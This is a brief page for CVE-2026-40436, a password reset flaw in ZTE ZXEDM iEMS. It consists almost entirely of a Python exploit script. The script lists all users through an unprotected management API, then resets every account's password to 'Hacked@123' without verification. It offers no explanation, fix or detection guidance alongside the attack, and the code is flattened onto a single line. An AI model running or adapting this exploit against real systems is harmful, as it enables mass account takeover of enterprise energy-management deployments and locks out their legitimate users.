CVE-2026-40436 ZTE ZXEDM iEMS密码重置漏洞

import requests # Target configuration target_host = "https://<target-ip>" base_url = f"{target_host}/api" # Attacker's session (assuming low privilege login) session = requests.Session() # login logic here if needed... # Step 1: Exploit User List Enumeration (Broken Access Control) print("[+] Attempting to enumerate users...") list_url = f"{base_url}/management/users/list" try: response = session.get(list_url, verify=False) if response.status_code == 200: users = response.json().get('data', []) print(f"[+] Successfully retrieved {len(users)} users.") # Step 2: Exploit Password Reset reset_url = f"{base_url}/management/users/reset_password" headers = {'Content-Type': 'application/json'} for user in users: username = user.get('username') user_id = user.get('id') print(f"[*] Attempting to reset password for: {username}") # Payload to reset password without verification payload = { "user_id": user_id, "new_password": "Hacked@123" } reset_resp = session.post(reset_url, json=payload, headers=headers, verify=False) if reset_resp.status_code == 200: print(f"[+] Password reset successful for {username}") else: print(f"[-] Failed to reset password for {username}") else: print("[-] Failed to retrieve user list.") except Exception as e: print(f"Error: {e}")